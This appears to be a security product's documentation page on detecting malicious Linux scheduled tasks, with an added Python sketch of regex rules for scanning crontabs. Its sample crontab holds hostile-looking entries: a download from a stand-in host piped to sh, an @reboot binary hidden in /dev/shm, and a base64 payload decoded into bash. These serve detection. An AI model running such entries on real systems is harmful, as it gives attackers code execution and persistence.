
Malicious Scheduled Task Detection


UHIDS's self-developed malicious scheduled task detection feature applies behavior analysis to scheduled tasks. By combining cloud-based big data analysis with static rules in the detection system, it detects common hacker behaviors in which scheduled tasks are used to hide and protect malicious processes and trojans.

Detection Principle

After the Agent client plugin is installed, UHIDS automatically reads the contents of the common scheduled task directories and locations on the system. It analyzes what it reads, assesses each task's behavior for malicious activity, and triggers an alert notification when a task is judged malicious.
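A minimal sketch of the read-then-assess flow described above, limited to crontab entries. It is an added example, not UHIDS code: the three static rules, the function names and the sample crontab are constructed assumptions.

```python
import re

# Constructed static rules for illustration; assumptions, not UHIDS's rule set.
RULES = [
    ("download-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|da|z)?sh\b")),
    ("decode-piped-to-shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|;]*\|\s*(ba|da|z)?sh\b")),
    ("runs-from-world-writable-dir",
     re.compile(r"(^|[\s;&|])(/tmp|/var/tmp|/dev/shm)/\S+")),
]
ENV_ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def extract_command(line, has_user_field=False):
    """Return the command part of one crontab line, or None if it has none."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_ASSIGN.match(line):
        return None
    # "@reboot"-style shortcuts use one schedule field, normal entries use five.
    # System crontabs (/etc/crontab, /etc/cron.d) add a user column after that.
    skip = (1 if line.startswith("@") else 5) + (1 if has_user_field else 0)
    parts = line.split(None, skip)
    return parts[skip] if len(parts) > skip else None  # None: malformed line

def scan_crontab(text, has_user_field=False):
    """Return (line number, matched rule names, command) for flagged entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        cmd = extract_command(line, has_user_field)
        hits = [name for name, rx in RULES if cmd and rx.search(cmd)]
        if hits:
            findings.append((lineno, hits, cmd))
    return findings

# Constructed sample in per-user crontab format (no user column).
SAMPLE = """\
# nightly backup
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/10 * * * * curl -fsSL http://example.invalid/u.sh | sh
@reboot /dev/shm/.cache/kworker
15 4 * * 0 echo Y29uc3RydWN0ZWQ= | base64 -d | bash
"""

if __name__ == "__main__":
    for lineno, hits, cmd in scan_crontab(SAMPLE):
        print(f"line {lineno}: {', '.join(hits)}: {cmd}")
```

Static patterns like these only cover the rule-based half of the approach; the behavior and cloud-side analysis the page mentions is not modelled here.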

Detection Cycle

  • By default, once started, the plugin runs a check every 2 hours.
  • After a risk has been cleared, the system rechecks that risk within 2 hours. If the risk has been fixed, the alert is deleted automatically.

Detection Items

| Detection Item | Description |
| --- | --- |
| Crontab Scheduled Task Detection | Detection of scheduled tasks in Linux cron settings. |
| Startup Task Detection | Detection of startup tasks in Linux system startup settings. |